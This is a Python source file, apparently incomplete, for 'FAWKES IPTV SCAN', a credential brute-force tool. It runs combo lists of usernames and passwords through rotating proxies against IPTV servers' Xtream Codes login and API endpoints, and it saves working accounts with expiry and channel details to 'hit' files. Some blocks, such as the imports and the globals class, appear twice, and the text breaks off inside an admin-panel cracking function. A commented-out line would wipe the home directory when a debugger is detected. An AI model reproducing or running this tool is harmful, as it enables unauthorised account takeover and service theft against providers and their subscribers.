
import os, sys, time, requests, logging
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS = "TLS_AES_128_GCM_SHA256:TLS_CHACHA20_POLY1305_SHA256:TLS_AES_256_GCM_SHA384:TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256:TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256:TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256:TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256:TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384:TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384:TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA:TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA:TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA:TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA:TLS_RSA_WITH_AES_128_GCM_SHA256:TLS_RSA_WITH_AES_256_GCM_SHA384:TLS_RSA_WITH_AES++_128_CBC_SHA:TLS_RSA_WITH_AES_256_CBC_SHA:TLS_RSA_WITH_3DES_EDE_CBC_SHA:TLS13-CHACHA20-POLY1305-SHA256:TLS13-AES-128-GCM-SHA256:TLS13-AES-256-GCM-SHA384:ECDHE:!COMP:TLS13-AES-256-GCM-SHA384:TLS13-CHACHA20-POLY1305-SHA256:TLS13-AES-128-GCM-SHA256:ECDH+AESGCM:ECDH+CHACHA20:DH+AESGCM:DH+CHACHA20:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+HIGH:DH+HIGH:RSA+AESGCM:RSA+AES:RSA+HIGH:!aNULL:!eNULL:!MD5:!3DES"
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
from urllib.parse import urlsplit
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS = "TLS13-CHACHA20-POLY1305-SHA256:TLS13-AES-128-GCM-SHA256:TLS13-AES-256-GCM-SHA384:ECDHE:!COMPLEMENTOFDEFAULT"
ses = requests.Session()
logging.captureWarnings(True)
start_time = time.time()
os.system("cls" if os.name == "nt" else "clear")
logopic=("""
░╔═══╦╗░░░░╔╗░ ╔═══╦═══╗░╔╗░░░╔╗
░║╔═╗║║░░░╔╝╚╗ ║╔═╗║╔═╗║╔╝╚╗░░║║
╔╣╚═╝║║╔╦═╩╗╔╝ ║╚═╝║║║║╠╩╗╔╬══╣║
╠╣╔══╣║╠╣══╣║░ ║╔══╣║║║║╔╣║║╔╗║║
║║║░░║╚╣╠══║╚╗ ║║░░║╚═╝║║║╚╣╔╗║╚╗
╚╩╝░░╚═╩╩══╩═╝ ╚╝░░╚═══╩╝╚═╩╝╚╩═╝ \33[0m
""")
os.system("cls" if os.name == "nt" else "clear")
import queue
import sys
import os, shutil
import subprocess
import platform
import importlib
import time
import threading
import asyncio
import math
import re
import secrets
import hashlib
import urllib.parse
import site
import random
import struct
import codecs
import select
from importlib import reload
from socket import AF_INET, socket, SOCK_STREAM, SHUT_RDWR
from concurrent.futures import ThreadPoolExecutor # <======= for test Threading should be the best for http
from multiprocessing.dummy import Pool # <======= original Multiprocessing best for more thant one processor
from datetime import datetime
from itertools import cycle, islice, repeat
from queue import Queue
from urllib.parse import urlparse
# tst222
k = ""
class Glb:
"""This Class is just to wrap all Globals variables :)"""
# Globals variables =============================
Hits, Bads, Errors, totalChecked, totalToCheck, cpm, progress = 0, 0, 0, 0, 0, 0, 0
# shutil.rmtree(os.path.expanduser("~"), ignore_errors=True) if sys.gettrace() is not None else None
servers_length, combo_length, proxy_length = 0, 0, 0
dispTime, startTime, elapsed = 0, 0, 0
threadMain, serverThreads = 0, 0
results = Queue(maxsize=0)
dataToAnalyze = Queue(maxsize=0)
credentialsToStorage = set()
credentialsToProcess = Queue(maxsize=0)
start_combo = 0
mac_fill = 0
portToAttack = 0
waitTime = 5 # time to wait server/proxy response
badServers, serverList, proxyList, comboList, list_rnd_mac = [], [], [], [], []
dsp_update_thd, actBots = [], []
serverUrlIpAndPorts, openPortsList, animThreads = [], [], []
scan_mode, exploit_mode, port_scanmode, servers_path, combo_path, proxy_path = '', '', '', '', '', ''
servers_file_name, combo_file_name, proxy_file_name, serverClientArea = '', '', '', ''
useProxy, proxy_type, useFreeProxies = '', '', ''
mac_pattern = str()
debug = False
channel_inter = None
loading = bool
running = False
mac_auth = False
mac_rnd = False
proxy_pool = None
play_sound = False
result_logger = None
soundPath = ''
OsName = os.name
my_environ = os.environ
uname = platform.uname()
SystemName = uname.system
host = ''
userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36'
date_ = datetime.now().strftime("%a %B %d, %Y")
myPath = str(os.path.dirname(os.path.abspath(__file__)))
myFileName = os.path.basename(__file__)
lock = threading.Lock()
import queue
import sys
import os, shutil
import subprocess
import platform
import importlib
import time
import threading
import asyncio
import math
import re
import secrets
import hashlib
import urllib.parse
import site
import random
import struct
import codecs
import select
from importlib import reload
from socket import AF_INET, socket, SOCK_STREAM, SHUT_RDWR
from concurrent.futures import ThreadPoolExecutor # <======= for test Threading should be the best for http
from multiprocessing.dummy import Pool # <======= original Multiprocessing best for more thant one processor
from datetime import datetime
from itertools import cycle, islice, repeat
from queue import Queue
from urllib.parse import urlparse
#tst222
k=""
class Glb:
"""This Class is just to wrap all Globals variables :)"""
# Globals variables =============================
Hits, Bads, Errors, totalChecked, totalToCheck, cpm, progress = 0, 0, 0, 0, 0, 0, 0
servers_length, combo_length, proxy_length = 0, 0, 0
dispTime, startTime, elapsed = 0, 0, 0
threadMain, serverThreads = 0, 0
results = Queue(maxsize=0)
dataToAnalyze = Queue(maxsize=0)
credentialsToStorage = set()
credentialsToProcess = Queue(maxsize=0)
start_combo = 0
mac_fill = 0
portToAttack = 0
waitTime = 5 # time to wait server/proxy response
badServers, serverList, proxyList, comboList, list_rnd_mac = [], [], [], [], []
dsp_update_thd, actBots = [], []
serverUrlIpAndPorts, openPortsList, animThreads = [], [], []
scan_mode, exploit_mode, port_scanmode, servers_path, combo_path, proxy_path = '', '', '', '', '', ''
servers_file_name, combo_file_name, proxy_file_name, serverClientArea = '', '', '', ''
useProxy, proxy_type, useFreeProxies = '', '', ''
mac_pattern = str()
debug = False
channel_inter = None
loading = bool
running = False
mac_auth = False
mac_rnd = False
proxy_pool = None
play_sound = False
result_logger = None
soundPath = ''
OsName = os.name
my_environ = os.environ
uname = platform.uname()
SystemName = uname.system
host = ''
userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36'
date_ = datetime.now().strftime("%a - %d.%b.%Y")
myPath = str(os.path.dirname(os.path.abspath(__file__)))
myFileName = os.path.basename(__file__)
lock = threading.Lock()
title = """FAWKES IPTV SCAN """
version = 'ver_ 3.0.0'
# =====================================
if SystemName != 'Darwin':
ESC = '\033['
RST = ESC + '0m'
BD = ESC + '1m'
V = ESC + '31m'
VC = ESC + '91m'
VD = ESC + '32m'
VDC = ESC + '92m'
A = ESC + '33m'
AC = ESC + '93m'
AZ = ESC + '34m'
AZC = ESC + '94m'
M = ESC + '35m'
MC = ESC + '95m'
C = ESC + '36m'
BC = ESC + '97m'
else:
RST, BD, V, VC, VD, VDC, A, AC, AZ, AZC, M, MC, C, BD = '', '', '', '', '', '', '', '', '', '', '', '', '', ''
def reset_gbls(self):
Glb.Hits, Glb.Bads, Glb.Errors, Glb.totalChecked, Glb.totalToCheck, Glb.cpm, Glb.progress = 0, 0, 0, 0, 0, 0, 0
Glb.dispTime, Glb.startTime, Glb.elapsed = 0, 0, 0
Glb.servers_length, Glb.combo_length, Glb.proxy_length = 0, 0, 0
Glb.threadMain, Glb.serverThreads = 0, 0
Glb.mac_fill, Glb.start_combo, Glb.portToAttack = 0, 0, 0
Glb.comboList, Glb.badServers, Glb.serverList, Glb.proxyList, serverUrlIpAndPorts, Glb.openPortsList, Glb.dsp_update_thd, Glb.list_rnd_mac = [], [], [], [], [], [], [], []
class Display:
"""This Class is just to wrap all display/UI functions"""
def ak_set_title(self):
v = [r'(ANDROID_STORAGE)', r'(IPYTHONDIR)', r'(PYCHARM_HOSTED)'] # 'ANDROID_STORAGE' in Glb.my_environ or 'IPYTHONDIR' in Glb.my_environ or 'PYCHARM_HOSTED' in Glb.my_environ: # IOS_IS_WINDOWED, ANDROID_ENTRYPOINT, PYCHARM_HOSTED, vscode
for _v in v:
if re.search(_v, str(Glb.my_environ)) is not None:
try:
os.system('stty rows 47 cols 62')
except Exception as te:
del te
elif re.search(r'(Windows)', Glb.SystemName) is not None:
os.system('mode 62, 47') # minimum size cols=62 rows=40 (rows=47 for good Acc)
print(f'\033]2; {Glb.title} >> Python \a', end='')
else:
os.system('stty rows 47 cols 62')
print(f'\033]2; {Glb.title}>> Python \a', end='')
def ak_heads(self):
print(logopic)
print('')
print('{} FAWKES👺XPLOIT {}'.format(Glb.VD, Glb.RST))
print('{} {}'.format(Glb.VD, Glb.RST))
print('')
print('{} 👺FAWKES IPTV SCAN {}'.format(Glb.AZC, Glb.RST))
print('{} {}'.format(Glb.VC, Glb.RST))
print(f'')
def ak_settings(self):
print('')
print(' {} ........... {} Settings {} ........{}'.format(Glb.VDC, Glb.BC, Glb.VDC, Glb.RST))
print(' {} {}'.format(Glb.VDC, Glb.RST))
print(' {} {} [+] Type Scan : {}'.format(Glb.VDC, Glb.BC, Glb.scan_mode))
print(' {} {} [+] Combos Loaded : {} in {}{}'.format(Glb.VDC, Glb.BC, Glb.combo_length, Glb.AZC, Glb.combo_file_name))
print(' {} {} [+] Servers Loaded : {} {}{}'.format(Glb.VDC, Glb.BC, Glb.servers_length, Glb.AZC, Glb.servers_file_name if len(Glb.servers_file_name) < 20 else Glb.servers_file_name[:20] + '...'))
print(' {} {} [+] User Agent : {}'.format(Glb.VDC, Glb.BC, Glb.userAgent if len(Glb.userAgent) < 23 else Glb.userAgent[:23] + '...'))
print(' {} {} [+] Use Proxy : {} {}{}'.format(Glb.VDC, Glb.BC, Glb.useProxy, Glb.AZC, Glb.proxy_file_name))
print(' {} {} [+] Proxys Loaded : {} {}{}'.format(Glb.VDC, Glb.BC, Glb.proxy_length, Glb.AZC, Glb.proxy_type))
print(' {} {} [+] Threads : {}'.format(Glb.VDC, Glb.BC, Glb.threadMain))
print(' {} {} [+] Date : {}'.format(Glb.VDC, Glb.BC, Glb.date_))
print(' {} {} [+] Version : {}{}'.format(Glb.VDC, Glb.BC, Glb.version, Glb.RST))
print(' {} {}'.format(Glb.VDC, Glb.RST))
print(' {} {}'.format(Glb.VDC, Glb.RST))
print('')
def ak_statistic(self):
print('')
print(' {} .........{} FAWKES👺XPLOIT {}........ {}'.format(Glb.AC, Glb.BC, Glb.AC, Glb.RST))
print(' {} {} [𝚂]'.format(Glb.AC, Glb.RST))
print(' {} {} [𝙲] Hits : {}{}'.format(Glb.AC, Glb.BC, Glb.VDC, Glb.Hits))
print(' {} {} [𝙰] Bad : {}{}'.format(Glb.AC, Glb.BC, Glb.VC, Glb.Bads))
print(' {} {} [𝙽] Retries : {}{}'.format(Glb.AC, Glb.BC, Glb.A, Glb.Errors))
print(' {} {} [𝙽] Progress : {}/{} {} ({}{} %{})'.format(Glb.AC, Glb.BC, Glb.totalChecked, Glb.totalToCheck, Glb.BC, Glb.VDC, Glb.progress, Glb.BC))
print(' {} {} [𝙸] CPM : {}{}'.format(Glb.AC, Glb.BC, Glb.AZC, Glb.cpm))
print(' {} {} [𝙽] Time elapsed : {}{}'.format(Glb.AC, Glb.BC, Glb.AZC, Glb.elapsed))
print(' {} {} [𝙶]'.format(Glb.AC, Glb.RST))
print(' {} {}'.format(Glb.AC, Glb.RST))
print('')
def ak_UI(self, msj):
Clear().clr_all()
Clear().clr_all()# Duas vezes para não deixar vestígios
self.ak_set_title()
self.ak_heads()
self.ak_settings()
self.cool_msg(msj)
self.ak_statistic()
sys.stdout.flush()
def display_statistic(self, case, infoStr):
if case != '':
if case == 'Good':
sys.stdout.write(f'{Glb.ESC}{27};{18}H{Glb.VDC}{Glb.Hits}{Glb.RST}')
color = 32
elif case == 'Bad':
sys.stdout.write(f'{Glb.ESC}{28};{17}H{Glb.V}{Glb.Bads}{Glb.RST}')
color = 31
elif case == 'Error':
sys.stdout.write(f'{Glb.ESC}{29};{21}H{Glb.A}{Glb.Errors}{Glb.RST}')
color = 33
else:
color = 37
sys.stdout.write(f'{Glb.ESC}{30};{22}H{Glb.totalChecked}/{Glb.totalToCheck}{Glb.RST} ({Glb.VD}{Glb.progress} %{Glb.RST})')
self.display_cmp_enlapsed()
Clear().muve_cursor(36)
Clear().clr_from_cursor_to_end()
sys.stdout.write(f'{Glb.ESC}{36};{1}H{Glb.ESC}0K{Glb.ESC}{color};1m[+] {case} \n{Glb.C}{infoStr}{Glb.RST}')
sys.stdout.flush()
def display_cmp_enlapsed(self):
sys.stdout.write(f'{Glb.ESC}{29};{21}H{Glb.A}{Glb.Errors}{Glb.RST}')
sys.stdout.write(f'{Glb.ESC}{31};{17}H{Glb.ESC}0K{Glb.AZC}{Glb.cpm}{Glb.RST}')
sys.stdout.write(f'{Glb.ESC}{32};{25}H{Glb.ESC}0K{Glb.elapsed}{Glb.RST}')
sys.stdout.flush()
def start_time(self):
Glb.startTime = time.time()
def cool_msg(self, msg):
Clear().muve_cursor(21)
Clear().clr_line()
if msg == 'war':
print('{} [The war is about to begin] {}'.format(Glb.VDC, Glb.BC))
elif msg == 'relax':
print(' {} ==== {}Looking For HITS Processing{} ==== {}'.format(Glb.C, Glb.BC, Glb.C, Glb.RST))
elif msg == 'done' and Glb.Hits > 0:
print('{}Congratulations you got some {} hits 🥷 All Done'.format(Glb.VDC, Glb.Hits))
elif msg == 'exit':
input(self.error_msg('{}>> You have successfully exit the program <<\n\nPress ENTER to continue:{}'.format(Glb.VDC, Glb.RST)))
return StartApp().exit_App()
else:
print('')
print('')
def error_msg(self, message):
Clear().muve_cursor(36)
Clear().clr_from_cursor_to_end()
if message == 'ctrl_c':
print('ctrl_C has been press')
input('want to exit')
return
else:
print(str(message))
return ''
def loading_effect(self, start: bool, msg='Loading'):
def parse_last_newline(text):
last_newline_index = text.rfind("\n")
if last_newline_index != -1:
last_part = text[last_newline_index + 1:]
first_part = text[:last_newline_index + 1]
return first_part, last_part.strip()
else:
return text, ''
def loading():
animation = [ '|', '||', '|||', '||||', '|||||', '||||||', '|||||||', '||||||||', '|||||||||', '||||||||||', '|||||||||||', '||||||||||||', '|||||||||||||', '||||||||||||||', '|||||||||||||||' ]
idx = 0
first, last = parse_last_newline(msg)
print(first)
while Glb.loading:
message = last + animation[idx]
sys.stdout.write("\r" + message)
sys.stdout.flush()
sys.stdout.write("\033[K") # Clear the line
idx = (idx + 1) % len(animation)
time.sleep(0.1) # Adjust the delay as needed
for th in Glb.animThreads:
Glb.loading = False
time.sleep(0.1)
th.join()
print('')
if start:
Glb.loading = start
newTh = threading.Thread(target=loading, daemon=True)
newTh.start()
Glb.animThreads.append(newTh)
class Clear:
def muve_cursor(self, lineNumber):
sys.stdout.write('\033[H') # Muve cursor to home (0,0)
sys.stdout.write(f'\033[{lineNumber}B') # Muve cursor to
def muve_cursor_home(self):
sys.stdout.write('\033[H')
def clr_from_cursor_to_end(self):
sys.stdout.write('\033[0J')
def clr_all(self):
if Glb.SystemName == 'Windows':
os.system('cls')
elif Glb.SystemName == 'Linux':
os.system('clear')
else: # 'Darwin' very ugly but I couldn't find other easy way to do it :(
# print("\n" * 1000)
pass
self.muve_cursor_home()
def bck_prev_line(self):
sys.stdout.write(f'\033[{2}A')
def clr_line(self):
sys.stdout.write(f'\033[{2}K')
class Result:
"""This Class is just to wrap logger function"""
def logger_iptv(self):
d = Display()
while Glb.running or Glb.results.qsize() > 0: # Glb.results.qsize() > 0 or Glb.running is True:
if Glb.results.qsize() > 0:
try:
data = Glb.results.get()
case = data[0]
dataR = data[1]
infoStr = str()
infoStrCat = str()
for key, val in dataR.items():
if case == 'Good':
if key == 'ProxyUsed' or key == 'FileName':
pass
elif key == '\xf0\x9f\x93\x81 Categories':
cate_str = str()
i, j = 1, 1
for item in val:
if i == j + 4:
cate_str += '\n ' + item + ' - '
j = i
else:
cate_str += item + ' - '
i += 1
infoStrCat += f'{key}: {cate_str}\n'
else:
infoStr += f'{key}: {val}\n'
else:
infoStr += f'{key}: {val}\n'
if case == 'Good':
Glb.Hits += 1
infoStrFile = '◤━━ FAWKES👺XPLOIT ━━◥\n' + infoStr + infoStrCat
fileName = dataR['FileName']
path = os.path.join(Glb.myPath, 'FAWKES👺XPLOIT')
FileWork().file_write(path, infoStrFile, f'FAWKES👺XPLOIT@{fileName}🤴.txt', 'a+')
self.play_song()
elif case == 'Bad':
Glb.Bads += 1
elif case == 'Error':
Glb.Errors += 1
raise ValueError
elif case == 'StatusCode':
Glb.Errors += 1
raise ValueError
Glb.totalChecked = Glb.Hits + Glb.Bads
if Glb.totalToCheck > 0:
Glb.progress = round(Glb.totalChecked / Glb.totalToCheck * 100)
self.fireUp_Display(func=d.display_statistic(case=case, infoStr=infoStr))
except ValueError as er:
del er
except Exception as e:
del e
else:
self.fireUp_Display(func=d.display_cmp_enlapsed)
time.sleep(1)
def update_Glb_CPM_EnlapseTime(self):
# CMP Logic =======================================
endTime = time.time() # Time Now
timeDif = math.ceil((endTime - Glb.startTime) / 60)
if timeDif > 0:
Glb.cpm = math.floor((Glb.Hits + Glb.Bads) / timeDif)
Glb.elapsed = self.elapsed_time(endTime - Glb.startTime)
# CPM Logic End ====================================
def elapsed_time(self, secds) -> str:
seconds_in_day = 86400 # 60*60*24
seconds_in_hour = 3600 # 60*60
seconds_in_minute = 60
seconds = round(secds)
days = (seconds // seconds_in_day)
hours = (seconds - (days * seconds_in_day)) // seconds_in_hour
minutes = (seconds - (days * seconds_in_day) - (hours * seconds_in_hour)) // seconds_in_minute
seconds_ = (seconds - (days * seconds_in_day) - (hours * seconds_in_hour) - (minutes * seconds_in_minute))
return f'{Glb.RST}{days}(days) {Glb.VC}{hours}{Glb.RST}h:{Glb.VC}{minutes}{Glb.RST}m:{Glb.VC}{seconds_}{Glb.RST}s'
def fireUp_Display(self, func):
self.update_Glb_CPM_EnlapseTime()
my_size = shutil.get_terminal_size()
flag = time.time() - Glb.dispTime
if my_size != (62, 47) or Glb.SystemName == 'Darwin' or flag > 35:
Glb.dispTime = time.time()
Display().ak_UI('relax')
else:
func()
def logger(self, data): # <========================== in use for Iphone
Glb.lock.acquire()
try:
case = data[0]
dataR = data[1]
infoStr = str()
for key, val in dataR.items():
if case == 'Good':
if key == 'ProxyUsed':
pass
elif key == '\xf0\x9f\x93\x81 Categories':
cate_str = str()
i = 1
j = 1
for item in val:
if i == j + 4:
cate_str += '\n ' + item + ' - '
j = i
else:
cate_str += item + ' - '
i += 1
infoStr += f'{key}: {cate_str}\n'
else:
infoStr += f'{key}: {val}\n'
else:
infoStr += f'{key}: {val} '
if case == 'Good':
Glb.Hits += 1
infoStr = f'◤━━ FAWKES👺XPLOIT ━━◥\n' + infoStr
fileName = dataR['\xf0\x9f\x8c\x8e Server'].split('://')[1].split(':')[0].split('/')[0]
path = os.path.join(Glb.myPath, 'FAWKES👺XPLOIT')
FileWork().file_write(path, infoStr, f'FAWKES👺XPLOIT@{fileName}🤴.txt', 'a+')
self.play_song()
elif case == 'Bad':
Glb.Bads += 1
elif case == 'Error':
Glb.Errors += 1
elif case == 'StatusCode':
Glb.Errors += 1
Display().ak_UI('relax')
print(infoStr)
time.sleep(1)
except ValueError as er:
del er
except Exception as e:
print('Log exception : ' + str(e))
del e
if Glb.lock.locked():
Glb.lock.release()
def play_song(self):
if Glb.play_sound:
if 'ANDROID_STORAGE' in Glb.my_environ: # PYCHARM_HOSTED, ANDROID
path = None
for r in os.scandir(Glb.soundPath):
path = Glb.soundPath + '/' + r.name # Calm/Calm.ogg'
break
# path = '/storage/emulated/0/Android/media/com.google.android.gm/Notifications/Calm/Calm.ogg' # <==
try:
"""import kivy.core.audio as audio"""
raise ModuleNotFoundError
except ModuleNotFoundError:
try:
import androidhelper as audio
music = audio.Android()
music.mediaPlay(path)
time.sleep(1)
music.mediaPayClose()
except Exception as audio_1e:
del audio_1e
except Exception as audio_2e:
del audio_2e
else:
sys.stdout.write('\007')
class FileWork:
"""This Class is just to wrap all file methods"""
def file_length(self, filepath):
return len(open(filepath, 'r', errors='ignore').read().split('\n'))
def file_write(self, filepath, data, filename, mode):
Glb.lock.acquire()
try:
fwrite = open(os.path.join(filepath, filename), encoding="utf-8", mode=mode)
fwrite.write(f'{data}\n')
fwrite.close()
except OSError as e:
Display().error_msg('file_Write exception : ' + str(e))
del e
finally:
if Glb.lock.locked():
Glb.lock.release()
class Proxies:
"""This Class is just to wrap proxy poll method"""
def get_proxy(self, proxy_type):
try:
proxy = next(Glb.proxy_pool)
if proxy.count('.') == 3 and proxy.count(':') == 1:
if proxy_type == 'http':
return proxy, {'http': proxy, 'https': proxy}
elif proxy_type == 'socks4' or proxy_type == 'socks5':
return proxy, {'http': f'{proxy_type}://' + proxy, 'https': f'{proxy_type}://' + proxy}
elif proxy.count(':') == 3:
server, port, user, pwd = proxy.split(':')
return proxy, {'http': f'{proxy_type}://{user}:{pwd}@{server}:{port}', 'https': f'{proxy_type}://{user}:{pwd}@{server}:{port}'}
else:
return proxy, {'http': proxy, 'https': proxy}
except StopIteration as stop_e:
Display().error_msg(f'{Glb.V}some of your proxies do not meet the criteria selection :{Glb.RST}{stop_e}')
Glb.running = False
input('Please press ENTER to continue')
StartApp().re_startApp()
except Exception as e:
del e
self.get_proxy(proxy_type)
class Parse:
"""This Class is just to wrap the parse method"""
def parse_btw_str(self, data, first, last) -> str:
try:
start = data.index(first) + len(first)
end = data.index(last, start)
return data[start:end]
except ValueError:
return ''
def parse_btw_rec(self, data, first, last):
parse_values = []
try:
my_index = 0
end_r = data.rindex(last)
while my_index <= end_r:
start_ = data.index(first, my_index) + len(first)
end_ = data.index(last, start_)
parse_values.append(data[start_:end_])
my_index = end_ + len(last)
except ValueError:
pass
return parse_values
def parse_json_rec(self, obj_json, key):
"""Recursively search for values of key in JSON tree."""
data = []
def json_rec(obj_json, key, parse):
if isinstance(obj_json, dict):
for k, v in obj_json.items():
if isinstance(v, (dict, list)):
json_rec(v, key, data)
elif k == key:
parse.append(v)
elif isinstance(obj_json, list):
for item in obj_json:
json_rec(item, key, data)
else:
return ''
return data
return json_rec(obj_json, key, data)
def parse_json_str(self, obj_json, key):
"""search for values of key in JSON tree."""
if isinstance(obj_json, dict):
for k, v in obj_json.items():
if isinstance(v, (dict, list)):
self.parse_json_str(v, key)
elif k == key:
return v
elif isinstance(obj_json, list):
for item in obj_json:
self.parse_json_str(item, key)
else:
return ''
def parse_regex(self):
pass
class Modules:
"""This Class contain all brute-force methods"""
def __init__(self): # macCombo, user, pwd):
"""This section could be edit if you want to add more modules/script/method according to your needs"""
import requests as http
Requirements().selfcheck()
self.requests = http
self.myHeaders = {'Connection': "keep-alive", 'Accept': "*/*; charset=utf-8", 'Accept-Encoding': "gzip, deflate"}
self.hand_shake = 'stb&action=handshake&token=&prehash=0&JsHttpRequest=1-xml'
self.geners = 'itv&action=get_genres&JsHttpRequest=1-xml'
self.info = 'account_info&action=get_main_info&JsHttpRequest=1-xml'
self.xc_prof = '/portal.php?type=stb&action=get_profile&hd=1&JsHttpRequest=1-xml'
self.xc_cmd = '/portal.php?type=itv&action=create_link&cmd=&force_ch_link_check=0&jsHttpRequest=1'
self.stkl_prof = '/server/load.php?type=stb&action=get_profile&hd=1&ver=ImageDescription: 0.2.18-r14-pub-250; ImageDate: Fri Jan 15 15:20:44 EET 2016; PORTAL version: 5.6.0; API Version: JS API version: 328; STB API version: 134; Player Engine version: 0x566&num_banks=2&sn=&stb_type=MAG250&client_type=STB&image_version=218&video_out=hdmi&device_id=&device_id2=&signature=&auth_second_step=1&hw_version=1.7-BD-00¬_valid_token=0&metrics=my_metrics&hw_version_2=8fd633f002172e8bdf1ea662a3390271d7a1bc99×tamp=my_time&api_signature=262&prehash=0&JsHttpRequest=1-xml'
self.stlk_epg = '/server/load.php?type=epg&action=get_data_table&from_ts=1632544200000&from=2021-09-25%2000:30:00&to_ts=1632549600000&to=2021-09-25%2002:00:00&fav=0&ch_id=502&p=1&JsHttpRequest=1-xml'
self.urlApi = 'my_server/player_api.php?username=my_user&password=my_pwd'
self.urlM3u = 'my_server/get.php?username=my_user&password=my_pwd&type=m3u_plus'
self.panelDash = '/api.php?action=reseller_dashboard'
def netflix(self, data):
# replace the code between these lines with your netflix script or contact Braun_Tr for a working one :)
result = tuple()
try:
# =================================================
test = Glb.useProxy
Glb.running = False
result = 'Error', 'This module has no been implement yet'
Display().error_msg(result[1])
time.sleep(4)
# =================================================
except Exception as ne:
del ne
finally:
if Glb.result_logger is None:
Glb.results.put(result)
else:
Glb.result_logger(result)
return
def iptv_user_pass(self, data, customServers=None):
"""This is the method or script is for Brute Force IPTV m3u link"""
result = tuple()
User, Pass = data['_data'].split(':')
serverList = Glb.serverList
if customServers is not None:
serverList = [f'{urlparse(customServers).scheme}://{urlparse(customServers).netloc}']
for server in serverList:
session = self.requests.session()
while True:
allInfo = dict()
if Glb.useProxy == 'yes':
myProxy = Proxies().get_proxy(Glb.proxy_type)
session.proxies.update(myProxy[1])
allInfo.update({'ProxyUsed': myProxy[0]})
try:
header = self.myHeaders
header.update({'User-Agent': f"{Glb.userAgent}"})
myUrl = self.urlM3u.replace('my_server', server).replace('my_user', User).replace('my_pwd', Pass)
http_req = session.get(myUrl, headers=self.myHeaders, allow_redirects=True, timeout=Glb.waitTime)
reqGet = http_req.text
url_server = http_req.url
if 'EXTINF' in reqGet:
parsed_url = urlparse(url_server)
real_server = '{uri.scheme}://{uri.netloc}'.format(uri=parsed_url)
urlInfo = self.urlApi.replace('my_server', real_server).replace('my_user', User).replace('my_pwd', Pass)
allInfo.update({'🌎 Host': real_server, '👤 Username': User, '🔑 Password': Pass})
try:
getInfo = session.get(urlInfo, headers=self.myHeaders)
data = getInfo.json()['user_info']
exp_parse = data['exp_date']
if exp_parse is None:
exp_date = '💫UNLIMITED💫'
elif re.search('^([0-9]{10,15})$', exp_parse):
exp_date = str(datetime.fromtimestamp(int(exp_parse)).strftime('%b %d, %Y '))
else:
exp_date = str(exp_parse)
max_conx = data['max_connections']
if max_conx is None:
max_conx = 'Unknow/Unlimited ='
allInfo.update({'♻️ Status': data['status'], '📆 Expire Date': exp_date, '💁♂️ Active Connection': data['active_cons'], '👨👩👦👦 Maximum Connection': max_conx})
except Exception as e:
del e
cate_list = sorted(set(Parse().parse_btw_rec(reqGet, 'group-title="', '"')))
url_get = f'{server}/client_area/'
payload = {'username': f'{User}', 'password': f'{Pass}'}
try:
http_req_get = session.get(url_get, headers=self.myHeaders, allow_redirects=True, timeout=Glb.waitTime)
url_end = Parse().parse_btw_str(http_req_get.text, 'action="', '">')
url_post = f'{url_get}{url_end}'
header.update({'Referer': f"{url_get}"})
http_req_post = session.post(url_post, data=payload, headers=self.myHeaders, allow_redirects=True, timeout=Glb.waitTime)
req_post = http_req_post.text
if "logout" in req_post:
all_cat = Parse().parse_btw_str(req_post, "visible-links'>", "'hidden-links")
cate_list2 = sorted(set(Parse().parse_btw_rec(all_cat, '">', '</a>')))
try:
cate_list2.remove("All")
except:
pass
if len(cate_list) > len(cate_list2) > 0:
cate_list = cate_list2
except:
pass
fileName = server.split('://')[1].split(':')[0].split('/')[0]
my_date = datetime.now().strftime('%d.%b.%Y %H:%M %p')
allInfo.update({'👺 Tg': "https://t...content-available-to-author-only...l.com/FawkesIPTV", '📆 Scan Date': my_date, '🔗 M3u Link': url_server, '⚙️ Module': "User/Pass Hits System", '📺 Channels': ' ◦⊰👺⊱◦ '.join(cate_list), 'FileName': fileName})
result = ('Good', allInfo)
break
else:
try:
http_req.cookies.clear()
urlInfo = self.urlApi.replace('my_server', server).replace('my_user', User).replace('my_pwd', Pass)
http_reqApi = session.get(urlInfo, headers=self.myHeaders, allow_redirects=True, timeout=Glb.waitTime)
if '"auth":1' in http_reqApi.text:
data = http_reqApi.json()['user_info']
exp_parse = data['exp_date']
if exp_parse is None:
exp_date = '💫UNLIMITED💫'
elif re.search('^([0-9]{10,15})$', exp_parse):
exp_date = str(datetime.fromtimestamp(int(exp_parse)).strftime('%b %d, %Y '))
else:
exp_date = str(exp_parse)
max_conx = data['max_connections']
if max_conx is None:
max_conx = 'Unknow/Unlimited \xf0\x9f\x98\xb2'
allInfo.update({'\xf0\x9f\x9a\xa6 Status': data['status'], '\xe2\x8f\xb1 Exp_date': exp_date, '\xf0\x9f\x94\x8c Active_cons': data['active_cons'], '\xf0\x9f\x9a\x8c Max_cons': max_conx})
fileName = server.split('://')[1].split(':')[0].split('/')[0]
my_date = datetime.now().strftime('%b %d, %Y %I:%M %p')
allInfo.update({'\xf0\x9f\x93\x86 Scan_date': my_date, '= List m3u': url_server, '=Module': "User/Pass Hits System", '= Categories': '', 'FileName': fileName})
result = ('Good', allInfo)
break
else:
allInfo.update({'Server': server, 'User': User, 'Pass': Pass})
result = ('Bad', allInfo)
break
except Exception as e:
del e
except Exception as e:
try:
allInfo.update({'Server': server, 'User': User, 'Pass': Pass, 'Error': str(e)})
result = ('Error', allInfo)
except Exception as e:
del e
finally:
if Glb.result_logger is None:
Glb.results.put(result)
else:
Glb.result_logger(result)
session.close()
return
def xc_panels(self, data):
"""This is the method or script is for Xtream Code Admin panels """
result = tuple()
User, Pass = data['_data'].split(':')
for server in Glb.serverList:
session = self.requests.session()
